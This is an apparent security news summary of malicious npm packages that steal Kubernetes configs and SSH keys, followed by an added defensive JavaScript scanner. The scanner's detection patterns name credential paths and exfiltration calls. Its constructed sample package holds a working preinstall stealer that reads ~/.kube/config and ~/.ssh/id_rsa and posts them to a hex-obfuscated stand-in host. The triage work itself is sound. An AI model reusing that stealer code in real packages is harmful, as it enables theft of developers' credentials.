"Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys"
Researchers have discovered a new set of malicious packages in the npm registry designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server. Sonatype reported discovering 14 npm packages that impersonate legitimate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools. Multiple versions of the packages were observed executing obfuscated code at install time (npm runs a package's install-lifecycle scripts automatically unless installs are run with scripts disabled) to collect sensitive files from the target system and send them to the attacker's server. In addition to Kubernetes configurations and SSH keys, the packages collect system metadata, including username, IP address, and hostname. The disclosure follows Sonatype's detection of counterfeit npm packages that use a technique known as dependency confusion to impersonate internal packages used by PayPal Zettle and Airbnb developers, published as part of an ethical research experiment. This article continues to discuss the new batch of malicious npm packages aimed at exfiltrating Kubernetes configurations and SSH keys from compromised machines to a remote server.
THN reports "Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys"
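The behaviour summarized above (install-time execution, reads of ~/.kube/config and ~/.ssh keys, host fingerprinting, an outbound channel, string obfuscation) is what a practitioner would want to triage before installing an unfamiliar package. The following is an added example, not code from Sonatype, THN, or the packages described; it scans an unpacked package for install-lifecycle hooks and for those ingredients in its JavaScript. The two sample packages, their names, and the hex-encoded host inside the malicious one are constructed for illustration.

```javascript
// Added example (not from the article or Sonatype): triage an unpacked npm
// package for the credential-stealer pattern described above. Input shape:
// { packageJson: <parsed package.json>, files: { relativePath: sourceText } }.

// npm runs these scripts automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator classes; each is a list of regexes applied to file source text.
const INDICATORS = {
  credentialPath: [/\.kube[\\/]+config/i, /\.ssh[\\/]/i, /\bid_(rsa|ed25519|ecdsa|dsa)\b/i],
  fingerprint:    [/os\.userInfo\s*\(/, /os\.hostname\s*\(/, /os\.networkInterfaces\s*\(/],
  exfil:          [/\bhttps?\.request\s*\(/, /\bfetch\s*\(/, /child_process/, /\bnet\.connect\s*\(/],
  obfuscation:    [/\beval\s*\(/, /new\s+Function\s*\(/, /\\x[0-9a-f]{2}/i, /\\u[0-9a-f]{4}/i, /\batob\s*\(/],
};

function triagePackage(pkg) {
  const findings = [];
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push({ kind: 'installHook', where: 'package.json', detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    if (!/\.(c|m)?js$/i.test(file)) continue;
    for (const [kind, patterns] of Object.entries(INDICATORS)) {
      for (const re of patterns) {
        const m = src.match(re);
        if (m) findings.push({ kind, where: file, detail: m[0] });
      }
    }
  }
  // Verdict: code that runs at install, touches credential files and has an
  // outbound channel is the combination this campaign relied on.
  const kinds = new Set(findings.map((f) => f.kind));
  let verdict = 'clean';
  if (kinds.has('installHook') && kinds.has('credentialPath') && kinds.has('exfil')) verdict = 'likely-stealer';
  else if (kinds.size > 0) verdict = 'review';
  return { name: pkg.packageJson.name, verdict, findings };
}

// Constructed sample: a typosquat-style package with a preinstall hook. The
// C2 host is hex-escaped the way obfuscated droppers often hide strings.
const MALICIOUS = {
  packageJson: { name: 'typescript-sdk-tools-hypothetical', version: '1.0.3', scripts: { preinstall: 'node index.js' } },
  files: {
    'index.js': [
      "const os=require('os'),fs=require('fs'),path=require('path'),https=require('https');",
      "const home=os.homedir();",
      "const payload={u:os.userInfo().username,h:os.hostname(),",
      "  k:fs.readFileSync(path.join(home,'.kube/config'),'utf8'),",
      "  s:fs.readFileSync(path.join(home,'.ssh/id_rsa'),'utf8')};",
      "const host='\\x63\\x32\\x2e\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65';",
      "https.request({host,path:'/up',method:'POST'}).end(JSON.stringify(payload));",
    ].join('\n'),
  },
};

// Constructed sample: an ordinary ESLint plugin with no hooks and no I/O.
const BENIGN = {
  packageJson: { name: 'eslint-plugin-hypothetical-benign', version: '2.0.0', main: 'index.js' },
  files: {
    'index.js': "module.exports = { rules: { 'no-console': require('./rules/no-console') } };",
    'rules/no-console.js':
      "module.exports = { create(context) { return { CallExpression(node) { " +
      "if (node.callee.object && node.callee.object.name === 'console') " +
      "context.report({ node, message: 'unexpected console call' }); } }; } };",
  },
};

for (const pkg of [MALICIOUS, BENIGN]) {
  const r = triagePackage(pkg);
  console.log(`${r.name}: ${r.verdict}`);
  for (const f of r.findings) console.log(`  [${f.kind}] ${f.where}: ${f.detail}`);
}
```

To apply this to a real dependency, fetch it with `npm pack <name>@<version>`, extract the tarball, parse its package.json and read its files into the input shape above. The check is a heuristic, not a verdict: minified code will trip the obfuscation patterns and a legitimate kubectl wrapper will reference ~/.kube/config, so treat 'review' as a prompt to read the code. Independently of any scanner, installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) removes the install-time execution this campaign depended on.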